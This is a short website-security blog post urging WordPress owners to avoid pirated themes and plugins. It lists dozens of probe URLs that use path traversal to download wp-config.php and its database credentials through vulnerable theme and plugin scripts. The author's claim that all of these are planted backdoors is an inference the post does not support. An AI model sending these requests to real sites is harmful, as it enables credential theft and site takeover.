Stop using pirated WordPress plugins. They may have back door access coding.

The popularity of the WordPress website management system makes it a target for hackers, and millions of WordPress driven websites are hacked daily. However the problem is not the core WordPress system for it is very secure, it's the "free" pirated plugins that make the framework weak.

If you are serious about doing business online and you choose to use the popular WordPress website framework, it is best to pay for the secure plugins rather than seek pirated versions. Those "free" versions of normally paid software are generally injected with "backdoor" coding to allow someone easy entry to your hosting account.

This list shows how a hacker who distributes 'free' plugins and themes, attempts to locate his hidden malware and access a WordPress website admin, database or FTP.

These are URLs entered in the standard browser address bar. If the file is located at an unfortunate WordPress website, the wp-config.php file will provide the database username and password which can then be accessed remotely, and the hacker will add himself as an administrator. His next action is to login to the WordPress site, install an FTP plugin and gain full access to the hosting FTP zone.

Protect your website by using legitimately purchased WordPress software. If a fly-by-night webmaster is offering pirated free scripts which normally is sold by a hard working developer, just flip them the bird!


This list shows the hacker is checking a WordPress website to see if it uses his pirated themes in which he stored a file named download.php and it it's found, a query is sent to activate a process to download the wp-config.php file which will provide the database username and password.

  • /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
  • /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
  • /wp-content/themes/lote27/download.php?download=../../../wp-config.php
  • /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
  • /wp-content/themes/epic/includes/download.php?file=../../../../wp-config.php
  • /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
  • /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
  • /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
  • /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php

In this list, the goal is the same, to get the wp-config.php file but the hacker now checks other plugins for known hidden backdoor files.

  • /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
  • /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
  • /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php
  • /wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php
  • /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php
  • /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
  • /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
  • /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
  • /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php
  • /wp-content/force-download.php?file=../wp-config.php
  • /wp-content/blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
  • /wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
  • /wp-admin/blog/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=showbiz_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=fe_get_sv_html&video=../wp-config.php
  • /wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php
  • /wordpress/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php
  • /wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php
  • /mdocs-posts/?mdocs-img-preview=../../../wp-config.php
  • /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=../../../../wp-config.php
  • /index.php/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
  • /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php

 

Most likely these hacked files are published at hacker forums and being used by millions of 'dark web' users around the world, so attempts will be relentless.

Website Tips